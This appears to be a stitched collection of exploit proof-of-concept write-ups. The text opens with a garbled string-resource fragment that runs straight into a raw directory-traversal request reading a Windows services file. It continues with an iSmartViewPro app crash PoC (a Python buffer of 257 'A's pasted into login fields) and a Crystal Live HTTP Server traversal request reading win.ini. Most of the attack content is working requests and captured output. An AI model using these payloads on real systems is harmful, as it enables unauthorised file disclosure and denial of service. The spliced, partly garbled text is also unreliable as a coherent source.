.L._.o.p.t.D.i.s.p.l.a.y.I.n.f.o.r.m.a.t.i.o.n.U.s.a.g.e.=.".D.i.s.p.l.a.y. .l.i.c.e.n.s.e. .i.n.f.o.r.m.a.t.i.o.n. .(.d.e.f.a.u.l.t.:. .c.u.r.r.e.n.t. .l.i.c.e.n.s.e.).". . .L._.o.p.t.D.i.s.p.l.a.y.I.n.f.o.r.m.a.t.i.o.n.V.e.r.b.o.s.e.=.".d.l.v.". . .L._.o.p.t.D.i.s.p.l.a.y.I.n.f.o.r.m.a.t.i.o.n.U.s.a.g.e.V.e.r.b.o.s.e.=.".D.i.s.p.l.a.y. .d.e.t.a.i.l.e.d. .l.i.c.e.n.s.e. .i.n.f.o.r.m.a.t.i.o.n. .(.d.e.f.a.u.l.t.:. .c.u.r.r.e.n.t. .l.i.c.e.n.s.e.).". . .L._.o.p.t.E.x.p.i.r.a.t.i.o.n.D.a.t.i.m.e.=.".x.p.r.". GET /../../../../../windows/system32/drivers/etc/services HTTP/1.1 TE: deflate,gzip;q=0.3 Connection: TE, close Host: 10.200.15.70:2070 User-Agent: Opera/9.50 (Macintosh; Intel Mac OS X; U; de) HTTP/1.0 200 OK Server: rXpress Content-Length: 17463 # Copyright (c) 1993-2004 Microsoft Corp. # # This file contains port numbers for well-known services defined by IANA # # Format: # # <service name> <port number>/<protocol> [aliases...] [#<comment>] # echo 7/tcp echo 7/udp discard 9/tcp sink null discard 9/udp sink null systat 11/tcp users #Active users systat 11/udp users #Active users daytime 13/tcp daytime 13/udp qotd 17/tcp quote #Quote of the day qotd 17/udp quote #Quote of the day chargen 19/tcp ttytst source #Character generator chargen 19/udp ttytst source #Character generator ftp-data 20/tcp #FTP, data ftp 21/tcp #FTP. control ssh 22/tcp #SSH Remote Login Protocol telnet 23/tcp smtp 25/tcp mail #Simple Mail Transfer Protocol time 37/tcp timserver

# Exploit Title: iSmartViewPro 1.3.34 - Denial of Service (PoC) # Discovery by: Ivan Marmolejo # Discovery Date: 2019 -11-16 # Vendor Homepage: http://www.smarteyegroup.com/ # Software Link: https://apps.apple.com/mx/app/ismartviewpro/id834791071 # Tested Version: 1.3.34 # Vulnerability Type: Denial of Service (DoS) Local # Tested on OS: iPhone 6s - iOS 13.2 ############################################################################################################################################## Summary: This app is specially built for P2P IP camera series. thanks to unique P2P connection technology that users are able to watch live video on iPhone from any purchased IP camera by simply enter camera's ID and password; no complex IP or router settings. The app have a lot of functions, such as local record video, set ftp params, set email, set motion alarm and so on. ############################################################################################################################################## Steps to Produce the Crash: 1.- Run python code: iSmartViewPro.py 2.- Copy content to clipboard 3.- Open App "iSmartViewPro" 4.- Go to "Add Camera" 5.- go to "Add network cameras" 6.- Paste ClipBoard on "Camara DID" 7.- Paste ClipBoard on "Password" 8.- Next 9.- Crashed ############################################################################################################################################## Python "iSmartViewPro" Code: buffer = "\x41" * 257 print (buffer) ##############################################################################################################################################

# Title: Crystal Live HTTP Server 6.01 - Directory Traversal # Date of found: 2019-11-17 # Author: Numan Türle # Vendor Homepage: https://www.genivia.com/ # Version : Crystal Quality 6.01.x.x # Software Link : https://www.crystalrs.com/crystal-quality-introduction/ POC --------- GET /../../../../../../../../../../../../windows/win.iniHTTP/1.1 Host: 12.0.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 Accept-Encoding: gzip, deflate Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close Response --------- ; for 16-bit app support [fonts] [extensions] [mci extensions] [files] [Mail] MAPI=1